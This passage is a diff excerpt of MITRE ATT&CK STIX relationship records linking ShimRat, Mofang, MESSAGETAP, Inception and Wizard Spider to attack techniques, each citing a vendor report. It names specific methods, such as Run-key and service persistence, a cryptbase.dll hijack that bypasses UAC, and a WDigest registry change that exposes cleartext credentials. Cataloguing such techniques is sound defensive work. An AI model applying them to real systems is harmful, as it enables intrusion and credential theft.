+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered a list of installed software on the infected host.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--222ce94a-bb33-476b-b4c3-56b529d9af03",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.397Z",
+ "created": "2020-05-12T21:44:41.020Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can use pre-configured HTTP proxies.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--0d1314fe-7fd6-4816-abb8-4b9872478807",
+ "type": "relationship",
+ "modified": "2020-05-12T21:56:32.904Z",
+ "created": "2020-05-12T21:56:32.904Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--7288054b-0679-497a-b4c5-090801b06941",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.300Z",
+ "created": "2020-05-12T21:56:32.909Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--0177d430-a0b9-4f2f-8c66-8dfa4391611a",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.302Z",
+ "created": "2020-05-12T21:56:32.975Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can list directories.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--ec095867-cb54-4fcf-b2c7-00e805bf7500",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.298Z",
+ "created": "2020-05-12T21:56:32.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can enumerate connected drives for infected host machines.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--d2ef2109-c65f-452b-bb5b-dd06d1b16602",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.301Z",
+ "created": "2020-05-12T21:56:32.981Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--4439e86a-de1d-4ea6-a856-858b799bcdc5",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.356Z",
+ "created": "2020-05-12T21:56:33.013Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has installed shim databases in the AppPatch folder.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--9ec20e7b-8996-4f16-b830-1f8a0e99b778",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.400Z",
+ "created": "2020-05-12T21:56:33.019Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has installed a Windows service to maintain persistence on victim machines.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--caa8b50b-67ab-4de4-b61a-ab89ea8a2e9b",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.401Z",
+ "created": "2020-05-12T21:56:33.022Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has installed a registry based start-up key HKCU\\Software\\microsoft\\windows\\CurrentVersion\\Run to maintain persistence should other methods fail.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--6435caf7-2493-4cfb-9ddc-2f672c220251",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.270Z",
+ "created": "2020-05-12T21:56:33.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--80a14bfe-6bf6-4f87-8ae1-5085505656f2",
+ "type": "relationship",
+ "modified": "2020-05-12T21:56:33.057Z",
+ "created": "2020-05-12T21:56:33.057Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) has compressed the [ShimRat](https://attack.mitre.org/software/S0444) executable within malicious email attachments. [Mofang](https://attack.mitre.org/groups/G0103) has also encrypted payloads before they are downloaded to victims.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--8ba71919-c776-4e1b-ad71-160649060d3e",
+ "type": "relationship",
+ "modified": "2020-05-15T18:20:15.802Z",
+ "created": "2020-05-12T22:05:50.738Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103)'s malicious spearphishing attachments required a user to open the file after receiving.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--b91c4f2d-8f21-46e9-a012-967436018eea",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.740Z",
+ "created": "2020-05-12T22:05:50.740Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--7b4af425-27a6-4330-85e2-d8d03911d923",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.745Z",
+ "created": "2020-05-12T22:05:50.745Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103)'s spearphishing emails required a user to click the link to connect to a compromised website.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--78a49769-fec0-4961-a25d-fc5eab623e93",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.747Z",
+ "created": "2020-05-12T22:05:50.747Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious links included.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--0f29f072-1eb1-4711-8679-19580f16b351",
+ "type": "relationship",
+ "modified": "2020-05-12T22:05:50.811Z",
+ "created": "2020-05-12T22:05:50.811Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "relationship_type": "uses",
+ "id": "relationship--69aa300b-3e31-438c-99bf-4822141046c5",
+ "type": "relationship",
+ "modified": "2020-05-15T15:36:36.960Z",
+ "created": "2020-05-12T22:05:50.826Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "relationship_type": "uses",
+ "id": "relationship--6f82d8a7-d168-4e19-97d2-3950f0c649ce",
+ "type": "relationship",
+ "modified": "2020-05-15T15:36:36.961Z",
+ "created": "2020-05-12T22:05:50.828Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) stored targeted SMS messages that matched its target list in CSV files on the compromised system.(Citation: FireEye MESSAGETAP October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aa12e2a6-02e7-4001-af7b-6a60021ddbfd",
+ "type": "relationship",
+ "modified": "2020-06-24T01:43:11.352Z",
+ "created": "2020-05-12T22:21:54.139Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has enumerated installed software on compromised systems.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3c9c3d3d-a209-43dc-ae8d-53cd4c1de65c",
+ "type": "relationship",
+ "modified": "2020-05-12T22:22:08.596Z",
+ "created": "2020-05-12T22:22:08.596Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has modified the Registry key HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--75f0ea4c-5b88-4b14-9859-67379f4ba9b0",
+ "type": "relationship",
+ "modified": "2020-05-13T12:42:06.757Z",
+ "created": "2020-05-13T12:42:06.757Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims to execute malware with spearphishing attachments containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, or [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--53e1bf2f-7ab4-4173-879b-9975618c4527",
+ "type": "relationship",
+ "modified": "2020-05-13T12:42:06.786Z",
+ "created": "2020-05-13T12:42:06.786Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks to install [TrickBot](https://attack.mitre.org/software/S0266), using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7e555910-0e1b-403d-a369-e7a2e8e61670",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.528Z",
+ "created": "2020-05-13T13:20:59.322Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks establish persistence for [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--57f8c6d0-406d-4e97-b3ff-5b2f0274231b",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.537Z",
+ "created": "2020-05-13T13:20:59.339Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used macros to execute PowerShell scripts to download malware on victims machines.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--73baa214-fbe6-477e-9beb-d1a08a6d117f",
+ "type": "relationship",
+ "modified": "2020-05-13T13:20:59.343Z",
+ "created": "2020-05-13T13:20:59.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used a module named NewBCtestnDll64 as a reverse SOCKS proxy.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f8a48d68-8557-4e17-a04b-9226efd4f4ef",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.578Z",
+ "created": "2020-05-13T13:20:59.374Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used file deletion to remove some modules and configurations from an infected host after use.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5c252868-1474-4fed-b3b2-07a6d3415034",
+ "type": "relationship",
+ "modified": "2020-05-13T13:58:12.424Z",
+ "created": "2020-05-13T13:58:12.424Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has installed [TrickBot](https://attack.mitre.org/software/S0266) as a service named ControlServiceA in order to establish persistence.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
